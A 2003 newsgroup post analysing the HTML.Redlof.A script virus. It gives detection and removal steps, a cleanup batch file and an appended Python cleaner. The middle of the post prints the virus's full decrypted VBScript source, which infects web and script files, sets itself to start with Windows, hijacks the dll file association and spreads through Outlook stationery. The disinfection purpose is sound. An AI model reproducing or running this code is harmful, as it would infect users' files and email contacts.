
Paper on the HTML.Redlof.A virus


Gumbo

Jan 3, 2003, 4:45:40 PM
Perhaps this is the second post about a full virus disassembly which is
still running strong in the wild.
I shall be talking about the HTML.Redlof.A "virus" which affects computers
running Windows with Windows Scripting Host activated.

Introduction:
-------------
Redlof is actually a HTML virus which can infect the user in the following
ways:

1. User opens a webpage infected with the virus
2. User opens a folder (with "View as Web Page" option enabled) infected with
the virus

After the first instance, the virus opens files of type .htt, .html, .htm,
.jsp, .asp, .php in the current folder, traverses up the tree, the "My
Documents" folder and sub folders.
It appends itself to Folder.htt in the current folder and/or to
C:\WinPath\Web\Folder.htt, but before infection backs up the clean copies to
Web\KJWALL.GIF (Folder.HTT) and System32\KJWALL.GIF (DeskTop.INI).
It writes another copy of itself into the file "Kernel.dll" or
"kernel32.dll" (provided it's NOT Microsoft's own core) and registers DLL
files to run WScript (WSH core) when they are loaded.
Based on the Windows OS, either Kernel.dll or Kernel32.dll is loaded at
startup. Thus, every file of the types given above is infected when opened.
It writes to the registry, and Outlook keys to send a copy of itself every
time a mail is sent. The virus is incorporated into the HTML formatting of
the mail itself and thus appears transparent to the user.
It also keeps the heart of the virus encrypted in a variable named
"ExeString", and it's decrypted during activation.
I have posted the decrypted source with this post at the end.

How do I know if I am infected ?
--------------------------------

Your AV should be the first one to indicate it. However, it probably will NOT
be able to clean it and will end up quarantining it.
You can also manually check for the following files on your HDD:
C:\WINDOWS\WEB\KJWALL.GIF
C:\WINDOWS\SYSTEM32\KJWALL.GIF
C:\WINDOWS\SYSTEM\KERNEL.DLL

Don't delete ANY of the above files now !
Also, you can know if it's active by:
1. Create an empty .txt file and rename it to .html. It should be 0 bytes.
2. Click on it. Then close it. If its size has increased to approx 12 Kbytes
automatically, then you ARE infected.

Oh my god !
-----------

You can easily get your system clean, by yourself. Follow the steps:

1. Using the Windows FIND tool (Start>Find), search for ANY file containing
the text "KJ_Start()". You should get quite a lot!
Rename ALL of them to .VIR
[E.g. rename Filename.HTML to Filename.HTML.VIR]
NOTE: Replace C:\Program Files\Common Files\Microsoft
Shared\Stationery\blank.htm with a clean one !

2. Rename (or delete) Folder.htt and Desktop.ini.

3. Using MSCONFIG, uncheck the entry "Kernel32" linked to the file kernel.dll
(or kernel32.dll, but make sure it isn't Microsoft's) to stop it from
loading at startup.
If you are a Windows 2K user, open REGEDIT, go to
[HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN] and remove
the entry for "Kernel32"

4. Boot to Real Mode MSDOS.
CD to the Web directory and delete Folder.htt and desktop.ini
Copy C:\WinPath\Web\kjwall.gif as Folder.htt and
C:\WinPath\System32\kjwall.gif as Desktop.ini
Delete kernel.dll from C:\WinPath\System\kernel.dll

Now you can do the following from either DOS or from Windows, whichever you
are comfortable with:

Open the files you had renamed .VIR in any text editor like Notepad and
search for the line(s)
<XMP><!--Incase Neworder board renders the HTML>
<!--Start Portions of virus code,search for the following in infected
files-->

<html><BODY text=black bgcolor=white onload="vbscript:KJ_start()">
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px;
height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest
HEIGHT=0 WIDTH=0 ... .. .. (etc)

till the lines(s)

Execute ThisText
</script>
</BODY>
</HTML>

<!--End Portions of virus code, end searching till here. Typically this
should be at the very end of the infected file -->
</XMP><!--Incase Neworder board renders the HTML>

Delete the WHOLE portion. Now the file is cleaned, and you can rename it back
to what it was.
Repeat this process for all the files (sorry ! I know it's kinda tedious,
but if the pages contained important data, you will recover a lot).
Now do a FULL system scan with your AV after getting the very latest
updates, and make sure you are clean, for even ONE stray file will render
all the above work useless!!

How do I save myself from further attacks ?
-------------------------------------------

If you are sure, you can just REMOVE the Windows Scripting Host from your
Windows. Go to "Add Remove Programs" in Control Panel and select the Windows
Setup tab. Click on "Accessories" and uncheck "Windows Scripting Host".
Click on Apply and you should be done. Just to make sure, search for the file
WScript.EXE and just delete it too if you find it!

Conclusion
----------

Thank your stars that the virus has no serious payload. WSH was needed in
only old apps, mainly for Dial-Up users connecting to shell accounts to
automate scripting jobs.
As far as I know, you really DO NOT need it now.
The "virus" is indeed a VERY INNOVATIVE idea by the programmer, but I should
NOT say that it has used an "exploit", for the virus uses a feature which can
propagate on ANY platform which renders HTML. However, it DOES exploit the WSH
in Windows. Perhaps I am not the first person to recommend that people
remove WSH from their system ;)

BTW: If you find any error (I know there might be) or wrong understanding on
my part, just mail me at kbshan...@yahoo.com. Be clear about what you
say.
Please DO NOT spam me though ! Please spare me that !

Here's the code which forms the heart of the virus and is encrypted in
infected file(s):
----------------------------------------------------------------------------
<XMP>
<!--Start code -->
<!-- Hope the Edge engine does NOT render the following code

Dim InWhere,HtmlText
,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
KJSetDim()
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub

Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
If TypeStr = "htt" Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" &
vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" &
"vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function

Function KJChangeSub(CurrentString,LastIndexChar)
If LastIndexChar = 0 Then
If Left(LCase(CurrentString),1) =< LCase("c") Then
KJChangeSub = FinalyDisk & ":\"
SubE = 0
Else
KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString,1,LastIndexChar)
End If
End Function

Function KJCreateMail()
On Error Resume Next
If InWhere = "html" Then
Exit Function
End If
ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft
Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then
Call KJAppendTo(ShareFile,"html")
Else
Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:"
& "KJ_start()""" & ">" & vbCrLf & HtmlText
FileTemp.Close
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion =
WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook
Express\MediaVer")
WsShell.RegWrite
"HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook
Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use
Stationery",1,"REG_DWORD"
Call
KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Out
look Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call
KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Out
look Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery
Name",ShareFile)
WsShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\Editor
Preference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging
Subsystem\Profiles\Microsoft Outlook Internet
Settings\0a0d020000000000c000000000000046\001e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows
NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook
Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
WsShell.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\Edito
rPreference",131072,"REG_DWORD"
Call
KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSetti
ngs\NewStationery","blank")
KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft
Shared\Stationery")
End Function

Function KJCreateMilieu()
On Error Resume Next
TempPath = ""
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",
StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath &
"system32\desktop.ini"
Call KJAppendTo(WinPath & "web\Folder.htt","htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content
Type","application/x-msdownload"
WsShell.RegWrite
"HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\
vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath &
TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite
"HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254C
A5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite
"HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C0
4F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
FileTemp.Close
End Function

Function KJLikeIt()
If InWhere <> "html" Then
Exit Function
End If
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation,9)
If FSO.GetExtensionName(ThisLocation) <> "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) -
Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
KJummageFolder(ThisLocation)
End If
End Function

Function KJMailReg(RegStr,FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr,FileName
End If
End Function

Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
Next
If DicSub.Count = 0 Then
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString =
Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
Else
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\"
Exit Do
Else
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then
CurrentString = CurrentString & DicSub.Item(j+1) & "\"
Exit Do
End If
End If
Next
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString =
Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)

CurrentString = KJChangeSub(CurrentString,LastIndexChar)
End If
End If
Loop
KJOboSub = CurrentString
End Function

Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook
Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i=1 to 5
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder(DiskDegree)
Next
WsShell.RegWrite RegPathValue,DiskDegree
End Function

Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP"
Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path,"html")
ElseIf FileExt = "VBS" Then
Call KJAppendTo(ThisFile.Path,"vbs")
ElseIf FileExt = "HTT" Then
HttExists = 1
End If
Next
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) =
UCase(WinPath & "Desktop"))Then
HttExists = 1
End If
If HttExists = 0 Then
FSO.CopyFile WinPath & "system32\desktop.ini",PathName
FSO.CopyFile WinPath & "web\Folder.htt",PathName
End If
End Function

Function KJSetDim()
On Error Resume Next
Err.Clear
TestIt = WScript.ScriptFullname
If Err Then
InWhere = "html"
Else
InWhere = "vbs"
End If
If InWhere = "vbs" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Else
Set AppleObject = document.applets("KJ_guest")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives
For Each DiskTemp In DiskObject
If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
Exit For
End If
FinalyDisk = DiskTemp.DriveLetter
Next
Dim OtherArr(3)
Randomize
For i=0 To 3
OtherArr(i) = Int((9 * Rnd))
Next
TempString = ""
For i=1 To Len(ThisText)
TempNum = Asc(Mid(ThisText,i,1))
If TempNum = 13 Then
TempNum = 28
ElseIf TempNum = 10 Then
TempNum = 29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4))
If TempChar = Chr(34) Then
TempChar = Chr(18)
End If
TempString = TempString & TempChar
Next
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " &
OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) &
"""&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " &
OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum =
Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum =
34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod
4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar =
vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar =
vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText &
TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
ThisText = "ExeString = """ & TempString & """"
HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " &
"""" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px;
height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET
NAME=KJ""&""_guest HEIGHT=0 WIDTH=0
code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" &
"/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script
language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<"
& "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
End If
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini",WinPath &
"system32\kjwall.gif"
End If
End Function
-->
</XMP>
<!-- End of code -->

Here's a batch file which you can use to clean the folder.htt and
desktop.ini.
RUN ONLY IF YOU ARE INFECTED !!

--------------Start CLEAN.BAT-------------------
REM It's assumed that you have your windows on C:\WINDOWS
REM If not, change it accordingly
@ECHO OFF
IF EXIST C:\WINDOWS\SYSTEM\KERNEL.DLL DEL C:\WINDOWS\SYSTEM\KERNEL.DLL
IF EXIST C:\WINDOWS\WEB\FOLDER.HTT DEL C:\WINDOWS\WEB\FOLDER.HTT
MOVE C:\WINDOWS\WEB\KJWALL.GIF C:\WINDOWS\WEB\FOLDER.HTT
ECHO Y|MOVE C:\WINDOWS\SYSTEM32\KJWALL.GIF C:\WINDOWS\WEB\DESKTOP.INI
IF EXIST C:\WINDOWS\system32\desktop.ini DEL C:\WINDOWS\system32\desktop.ini
COPY C:\WINDOWS\WEB\DESKTOP.INI C:\WINDOWS\system32\desktop.ini
ECHO System is clean !
ECHO Make sure you have cleaned C:\Program Files\Common Files\Microsoft
Shared\Stationery\blank.htm !
PAUSE
--------------End Clean.BAT--------------------
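The detection and cleaning steps from the post (search files for "KJ_start()", keep the hit as .VIR, cut the appended portion from the injected BODY tag to the end of the file), as an added Python example that is not part of the original post or the batch file above. It assumes the file layout produced by KJAppendTo in the decrypted source, and goes beyond the post by also handling the .vbs form and by refusing to cut a file where the block sits at offset 0 (the prepended Folder.htt form, which the post restores from kjwall.gif instead).

```python
import re
from pathlib import Path

# String the post tells you to search for with the Windows FIND tool.
MARKER = "KJ_start()"

# Where the appended block begins, derived from KJAppendTo in the decrypted source:
#   htm/html/asp/php/jsp: CRLF, "<HTML>", CRLF, <BODY onload="vbscript:KJ_start()"> ... </HTML>
#   vbs:                  CRLF, then the 'ExeString = "..."' line, the decoder and KJ_start()
# Folder.htt is prepended to rather than appended, so it is restored from the
# kjwall.gif backup (step 4 of the post) instead of being cleaned here.
HTML_START = re.compile(
    r'(?:\r?\n)?(?:<HTML>)?(?:\r?\n)?<BODY[^>]*onload="vbscript:KJ_start\(\)"[^>]*>',
    re.IGNORECASE)
VBS_START = re.compile(r'\r?\n(?=ExeString = ")')
EXTENSIONS = {".htm", ".html", ".asp", ".php", ".jsp", ".vbs"}


def is_infected(text):
    return MARKER in text


def strip_redlof(text):
    """Return text with the appended Redlof block removed (the manual step in the post).
    No marker, an unknown layout, or a block at offset 0 (the prepended .htt form)
    returns the text unchanged, so a file is never emptied or truncated by mistake."""
    if not is_infected(text):
        return text
    starts = [m.start() for m in (HTML_START.search(text), VBS_START.search(text)) if m]
    cut = min(starts) if starts else 0
    return text[:cut] if cut > 0 else text


def clean_tree(root, apply=False):
    """Walk root and return the infected files found. With apply=True the original is
    kept as <name>.VIR (as the post recommends) and the cleaned content is written back
    under the original name; a file strip_redlof() cannot handle is only quarantined."""
    found = []
    for path in list(Path(root).rglob("*")):  # snapshot first: we rename while walking
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        try:
            text = path.read_bytes().decode("latin-1")  # bytes, so CRLF survives intact
        except OSError:
            continue
        if not is_infected(text):
            continue
        found.append(path)
        if apply:
            path.rename(path.with_name(path.name + ".VIR"))
            cleaned = strip_redlof(text)
            if cleaned != text:
                path.write_bytes(cleaned.encode("latin-1"))
    return found
```

Call clean_tree(root) to list the infected files under a folder, and clean_tree(root, apply=True) to quarantine them as .VIR and write the cleaned copies back; the AV rescan the post asks for afterwards still applies.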
